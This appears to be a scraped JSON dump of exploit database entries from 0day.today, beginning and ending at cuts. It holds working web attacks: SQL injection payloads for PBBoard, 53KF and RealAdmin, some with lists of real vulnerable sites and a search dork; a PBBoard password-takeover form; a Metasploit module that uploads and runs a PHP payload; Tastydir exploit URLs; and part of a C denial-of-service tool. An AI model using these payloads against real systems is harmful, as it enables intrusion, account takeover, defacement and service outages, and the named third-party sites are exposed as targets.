"http://0day.today/exploit/21972", "hash": "1942384d3328480572049ab5f951544f997dae7fad13b5d60f3fa6cbfcb868cf"}, {"lastseen": "2016-04-20T02:12:41", "references": [], "description": "Exploit for asp platform in category web applications", "edition": 1, "reporter": "The Black Devils", "published": "2012-12-04T00:00:00", "type": "zdt", "title": "53KF sql injection Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-12-04T00:00:00", "href": "http://0day.today/exploit/description/19883", "id": "1337DAY-ID-19883", "sourceData": "# Exploit Title: 53KF sql injection Vulnerability\r\n# Date: 05/10/2012\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Software Link: http://www.53kf.com/\r\n# Category : [ webapps ]\r\n# Dork : use google\r\n# Type : asp\r\n# Tested on: [Windows] & [Ubuntu]\r\n\r\n-------------------------------\r\n\r\nhttp:\\Localhost\\[Path]\\shop.asp?id= sql injection\r\n\r\n-------------------------------\r\n\r\n# Demo site:\r\nhttp://www.fenhong123.com/eshop/shop.asp?id=1796'\r\nhttp://www.51sxh.com/shop.asp?id=1216'\r\nhttp://www.firstaidkitsaustralia.com.au/shop.asp?id=1'\r\n\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/19883", "hash": "6e32eb84b25570840779f2b4b57f8ab85c5bda5c56db43ef4daa54c174af5e27"}, {"lastseen": "2016-04-20T01:44:02", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "High-Tech Bridge", "published": "2012-08-11T00:00:00", "type": "zdt", "title": "PBBoard 2.1.4 SQL Injection / Improper Authentication / Broken Access Control", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-08-11T00:00:00", "href": "http://0day.today/exploit/description/19165", "id": "1337DAY-ID-19165", "sourceData": "Vendor: www.pbboard.com\r\nVulnerable Version(s): 2.1.4 and probably prior\r\nTested Version: 2.1.4\r\nVendor Notification: July 18, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284]\r\nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.\r\n\r\n\r\n1) Multiple SQL Injections in PBBoard: CVE-2012-4034\r\n\r\n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n 1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"check[]\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"new_password\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \r\n\r\n\r\n2) Improper Authentication in PBBoard: CVE-2012-4035\r\n\r\nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script.\r\n\r\nThe following PoC changes password for the user with ID=1 (forum administrator):\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"new_password\" value=\"new_password\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n\r\n3) Improper Access Control in PBBoard: CVE-2012-4036\r\n\r\nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file.\r\n\r\nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration.\r\n\r\nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"context\" value='<? phpinfo(); ?>'>\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires administrative priveledges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply 5-8-2012 Security Patch\r\n\r\nMore Information:\r\nhttp://www.pbboard.com/forums/t10352.html\r\nhttp://www.pbboard.com/forums/t10353.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/19165", "hash": "ab603478f112b3e70b9f54d0f81f87e5a4070ecfb86c2e9a6631c9410ac96595"}, {"lastseen": "2016-04-20T01:57:50", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "KedAns-Dz", "published": "2012-05-29T00:00:00", "type": "zdt", "title": "PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-05-29T00:00:00", "href": "http://0day.today/exploit/description/18382", "id": "1337DAY-ID-18382", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n###\r\n# Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF)\r\n# Author : KedAns-Dz\r\n# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)\r\n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)\r\n# Web Site : www.1337day.com | www.inj3ct0rs.com\r\n# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d\r\n# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com\r\n# platform : php\r\n# Type : Metasploit -Remote Exploit-\r\n# Security Risk : Critical\r\n# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10\r\n###\r\n\r\n##\r\n# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |\r\n# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |\r\n# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |\r\n# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** |\r\n# | ------------------------------------------------- < |\r\n##\r\n\r\n# <3 <3 Greetings t0 Palestine <3 <3\r\n\r\n# Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip]\r\n\r\n######## (!) References =>\r\n# _______________\r\n# | CVE-2012-1216 |\r\n# | OSVDB-79218 |\r\n# | 1337ID-17520 |\r\n# | PS-SEC-109706 |\r\n# | CWE-352 |\r\n# ---------------\r\n#\r\n######## (!) Exploit ====>\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution\",\r\n 'Description' => %q{\r\n This module exploits a Multiple cross-site request forgery (CSRF) vulnerabilities \r\n in admin.php in PBBoard 2.1.4 allow remote attackers to hijack the authentication \r\n of administrators for requests that upload a file via an add action.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2012-1216'],\r\n ['OSVDB', '79218'],\r\n ['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520\r\n ['URL', 'http://secunia.com/advisories/47948/'], # SA47948\r\n ['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706\r\n # CWE-352\r\n # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"none\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['PBBoard v2.1.4', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Fev 12 2012\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to dorncms', '/PBBoard v2.1.4'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n uri << '/' if uri[-1,1] != '/'\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri}admin.php\"\r\n })\r\n\r\n if res and res.code == 200 and res.body.empty?\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n uri << '/' if uri[-1,1] != '/'\r\n\r\n peer = \"#{rhost}:#{rport}\"\r\n payload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php'\r\n\r\n post_data = \"--1337day\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\"\r\n post_data << \"Content-Type : text/html;\\r\\n\"\r\n post_data << \"<?php \"\r\n post_data << payload.encoded\r\n post_data << \" ?>\\r\\n\"\r\n post_data << \"--1337day\\r\\n\"\r\n\r\n print_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri}admin.php?page=pages&add=1&start=1\",\r\n 'ctype' => 'multipart/form-data; boundary=1337day',\r\n 'data' => post_data\r\n })\r\n\r\n if not res or res.code != 200 or res.body !~ /#{payload_name}/\r\n print_error(\"#{peer} - I don't think the file was uploaded !\")\r\n return\r\n end\r\n\r\n print_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n # Execute our payload\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri}#{payload_name}\"\r\n })\r\n\r\n if res and res.code != 200\r\n print_status(\"#{peer} - Server returns #{res.code.to_s}\")\r\n end\r\n end\r\n\r\n############# << ThE|End\r\n\r\n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================\r\n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w\r\n# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)\r\n# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection\r\n# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore\r\n# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke\r\n# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE\r\n# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs ..\r\n#===========================================================================================================\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/18382", "hash": "78614d114d0763002c5f71d6c338e1f5b651fa55832e5b3dc2cd33fc48a29231"}, {"lastseen": "2016-04-20T01:23:58", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "ShinoBi-Dz", "published": "2012-04-22T00:00:00", "type": "zdt", "title": "RealAdmin - (content.php) Blind SQL Injection Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-04-22T00:00:00", "href": "http://0day.today/exploit/description/18107", "id": "1337DAY-ID-18107", "sourceData": "#########################################################################\r\n# Exploit Title: [ RealAdmin - SQL Injection Vulnerability ] \r\n# Date: [22-04-2012] \r\n# Author: [ShinoBi-Dz]\r\n# E-mail : ShinoBiDz442@gmail.com \r\n# Facebook : https://www.facebook.com/shinobi.benz \r\n# Category: [webapps] \r\n# Google dork: inurl:\"content.php?id=\" intext:\"powered by realadmin\" \r\n# Tested on: [Windows 7 ] \r\n#########################################################################\r\n\r\nExample Sites : \r\nhttp://exitrealtycitadel.realadmin.ca/content.php?id=1216'\r\nhttp://kmammen.realadmin.ca/content.php?id=1916'\r\nhttp://citigrouprealty.ca/content.php?id=908'\r\nhttp://www.exitinterlake.com/content.php?id=2963'\r\nhttp://www.gorhamrealestate.ca/content.php?id=284'\r\nhttp://www.exitplatinum.com/content.php?id=2025'\r\n\r\nand more in Google\r\n\r\n\r\n[~]Exploit/p0c :\r\nhttp://www.site.com/content.php?id=-[]+union+select+1,2,3,4,5,6,7,8,9--\r\n\r\n\r\nGreetz [ Arm4dill0.DZ - KedAns-Dz - HMD442 - All Hacker's ALG - Mouh-Marvel ] \r\n\r\n -[Freedom to Palestine]-\r\n\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/18107", "hash": "d747adb9d948492f7461e681753566fe8b39f310dcb0674bec983d8820d352a9"}, {"lastseen": "2016-04-20T00:30:29", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "n/a", "published": "2010-10-18T00:00:00", "type": "zdt", "title": "Tastydir <= 1.2 (1216) Multiple Vulnerabilities", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-10-18T00:00:00", "href": "http://0day.today/exploit/description/14506", "id": "1337DAY-ID-14506", "sourceData": "===============================================\r\nTastydir <= 1.2 (1216) Multiple Vulnerabilities\r\n===============================================\r\n\r\n# Software Link: http://codecanyon.net/item/tastydir-an-ajax-file-manager-and-dir-listing/117167\r\n# Version: 1216\r\n# Tested on: Ubuntu 10.10\r\n# Information:\r\n \r\nTastydir is a cross-platform PHP file management system\r\nwhich allows you to not only replace your traditional FTP\r\nclient but also allow your users to view directories in\r\na much more aesthetically pleasing way.\r\n \r\n \r\n# Vulnerability (Folder Creation):\r\n \r\nTastydir has the option to remotely create folders on your\r\nserver, but it doesn't check if the user is logged in or\r\nnot so an attacker can easily create folders from the\r\nserver and access.\r\n \r\n# Exploitation:\r\n \r\nhttp://localhost/_tastydir/do.php?mkdir=/var/www/test\r\n \r\n \r\n# Vulnerability (File Listing):\r\n \r\nTastydir version 1216 and below present a file listing\r\nvulnerability, an attacker can list all the files from\r\na folder, and can see the permissions for that file and\r\nit's size.\r\n \r\n# Exploitation:\r\n \r\nhttp://localhost/_tastydir/do.php?d=/var/www/\r\n \r\n \r\n# Vulnerability (Cookie Forgery):\r\n \r\nWhen a user logs, a cookie named tastydir_auth is created,\r\nthe data section contains the twice hashed sha1 password\r\nof the administrator.\r\n \r\n# Exploitation:\r\n \r\nAn attacker given certain conditions ( by disclosing the\r\nhashed password from _tastydir/settings.php ) can forge\r\na cookie to imitate an authentic log in, without having\r\nto crack the password, by hashing the hashed password\r\nusing the sha1 algorithm and inserting it into the cookie.\r\n \r\n# Cookie:\r\n \r\nName: tastydir_auth\r\nContent: [2x hashed password sha1]\r\n \r\n \r\n# Vulnerability (chmod):\r\n \r\nTastydir has the option to remotely chmod files from your\r\nserver, but it doesn't check if the user is logged in or\r\nnot so an attacker can easily chmod the files from the\r\nserver.\r\n \r\n# Exploitation:\r\n \r\nhttp://localhost/_tastydir/do.php?chmod=/var/www/index.php&to=000\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/14506", "hash": "a9b69fa24baef45fa4c3da9b54b1b2e98173fa95d37c5785665b960395db775f"}, {"lastseen": "2016-04-19T04:33:58", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 1, "reporter": "Lunar Fault", "published": "2002-05-19T00:00:00", "type": "zdt", "title": "psyBNC <= 2.3 Denial of Service Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-05-19T00:00:00", "href": "http://0day.today/exploit/description/5816", "id": "1337DAY-ID-5816", "sourceData": "=======================================\r\npsyBNC <= 2.3 Denial of Service Exploit\r\n=======================================\r\n\r\n\r\n/* \r\n* psyBNC <= 2.3 DoS\r\n* Information System Advancement in Penetration (ISAP) Labs\r\n* By Lunar Fault [ElectronicSouls]\r\n* (C) May 19, 2002\r\n*\r\n* Legal Notice:\r\n* In no way is ElectronicSouls, ISAP, or the author responsible for the\r\n* actions or usage of this program. The author retains all copyrights to the\r\n* contents within includeing this banner, except for the resolvenametoip() \r\n* function. This source is not to be used for illegal purposes. Please check \r\n* your local laws before testing this proof of concept. \r\n*\r\n* Description: \r\n* Problem dealing with over sized passwords. Once the DoS has been sent the \r\n* victim's psybnc's pid slowly begins to eat up cpu usage. This also results \r\n* in the fact that psybnc holds the connection with a TIME_WAIT further denying \r\n* access to the bnc. If you try and exploit the server more times than it allows \r\n* connections in force mode. The result will be a Broken Pipe, in standard mode it \r\n* will tell you the server is not vuln.\r\n* \r\n* es 11805 99.7 1.9 2672 1216 pts/1 R 06:28 19:17 ./psybnc \r\n*\r\n* Tested on psyBNC2.3, psyBNC2.2.1, psyBNC2.1.1\r\n* Succefully exploited on Linux x86, and OpenBSD 3.0 x86. \r\n* \r\n* Lunar Fault\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <getopt.h>\r\n#include <unistd.h>\r\n#include <string.h> \r\n\r\n#define SIZE 9000\r\n#define PORT 31337 \r\n#define USER \"pr0ix\"\r\n\r\nint senddos(int port, int size, char *target, char *user);\r\nint checkvuln(char *rxbuf); \r\nint testvuln(int port, char *target);\r\nunsigned long resolvenametoip(char *name); \r\nvoid usage(char *prog);\r\n\r\nint checked = 0;\r\nint force;\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int c, i, z;\r\n int port, size, times;\r\n int u_t = 0, d_t = 0, n_t = 0, p_t = 0, s_t = 0, t_t;\r\n char target[1024], *user;\r\n \r\n printf(\"[+] ES psyBNC <= 2.3 DoS\\n\");\r\n printf(\"[+] Information System Advancement in Penetration (ISAP) Labs\\n\");\r\n printf(\"[+] By: Lunar Fault [ElectronicSouls]\\n\");\r\n \r\n if(argc < 2) { usage(argv[0]);} \r\n \r\n while ((c = getopt (argc, argv, \"d:n:p:s:u:hft\"))!=EOF) {\r\n switch(c) {\r\n case 'h':\r\n usage(argv[0]);\r\n break;\r\n case 'f':\r\n force = 1;\r\n break;\r\n case 'd':\r\n strncpy(target, optarg, sizeof(target));\r\n d_t = 1;\r\n break;\r\n case 'n':\r\n times = atoi(optarg);\r\n n_t = 1;\r\n break;\r\n case 'p':\r\n port = atoi(optarg);\r\n p_t = 1;\r\n break;\r\n case 's':\r\n size = atoi(optarg);\r\n s_t = 1;\r\n break;\r\n case 't':\r\n t_t = 1;\r\n break;\r\n case 'u':\r\n user = (char *) malloc(strlen(optarg));\r\n memcpy(user, optarg, strlen(optarg));\r\n u_t = 1;\r\n break;\r\n }\r\n }\r\n \r\n if (d_t == 0) { usage(argv[0]); }\r\n \r\n if (n_t == 0) times = 3;\r\n \r\n if (p_t == 0) port = PORT;\r\n \r\n if (s_t == 0) size = SIZE;\r\n \r\n if (u_t == 0) { \r\n user = (char *) malloc(strlen(USER));\r\n memcpy(user, USER, strlen(USER));\r\n }\r\n \r\n printf(\"[*] Victim: %s\\n\", target);\r\n printf(\"[*] Port: %d\\n\", port);\r\n printf(\"[*] User: %s\\n\", user);\r\n printf(\"[*] Size: %d\\n\", size);\r\n printf(\"[*] Times: %d\\n\", times);\r\n \r\n if (t_t == 1) {\r\n printf(\"[*] Testing for vulnerability\\n\");\r\n z = testvuln(port, target);\r\n printf(\"\\n\");\r\n if (z == -1) {\r\n printf(\"[!] Failed to test Vuln!\\n\");\r\n exit(1);\r\n }\r\n return 0;\r\n } \r\n \r\n if (force == 1) \r\n printf(\"[*] Forceing DoS\\n\"); \r\n \r\n for (i = 0; i < times; i++) {\r\n z = senddos(port, size, target, user);\r\n if (z == -1) {\r\n printf(\"[!] Failed on sending DoS!\\n\");\r\n exit(1);\r\n }\r\n }\r\n \r\n printf(\"[*] DoS sent %d times\\n\\n\", times);\r\n return 0;\r\n}\r\n\r\nint senddos(int port, int size, char *target, char *user)\r\n{\r\n int i, s, z, len_inet;\r\n unsigned long ipaddr;\r\n char *dosbuf, tmpbuf[128], *passbuf, rxbuf[1024];\r\n \r\n struct sockaddr_in victim;\r\n \r\n if (!(ipaddr = resolvenametoip(target))) {\r\n printf(\"[!] Failed to resolve '%s'\\n\", target);\r\n exit(1);\r\n }\r\n \r\n victim.sin_family = AF_INET;\r\n victim.sin_port = htons(port);\r\n victim.sin_addr.s_addr = ipaddr;\r\n \r\n len_inet = sizeof(victim);\r\n \r\n s = socket(PF_INET, SOCK_STREAM, 0);\r\n if (s < 0) {\r\n printf(\"[!] Failed to open socket!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = connect(s, (struct sockaddr *)&victim, len_inet);\r\n if (z < 0) {\r\n printf(\"[!] Connection refused!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = read(s, rxbuf, sizeof(rxbuf));\r\n if (z == -1) {\r\n printf(\"[!] Failed on read!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = checkvuln(rxbuf);\r\n if (z == -1) {\r\n printf(\"[!] Failed on vuln check!\\n\");\r\n exit(1);\r\n }\r\n \r\n snprintf(tmpbuf, sizeof(tmpbuf), \"NICK %s\\n\\r\", user);\r\n \r\n z = write(s, tmpbuf, strlen(tmpbuf));\r\n if (z == -1) {\r\n printf(\"[!] Failed on write!\\n\");\r\n exit(1);\r\n }\r\n \r\n z = read(s, rxbuf, sizeof(rxbuf));\r\n if (z == -1) {\r\n printf(\"[!] Failed on read!\\n\");\r\n exit(1);\r\n }\r\n \r\n passbuf = (char *) malloc(size);\r\n for (i = 0; i < size; i++) \r\n *(char *) &passbuf[i] = \"A\";\r\n \r\n dosbuf = (char *) malloc(7 + strlen(passbuf));\r\n \r\n memcpy(dosbuf, \"PASS \", 5);\r\n \r\n 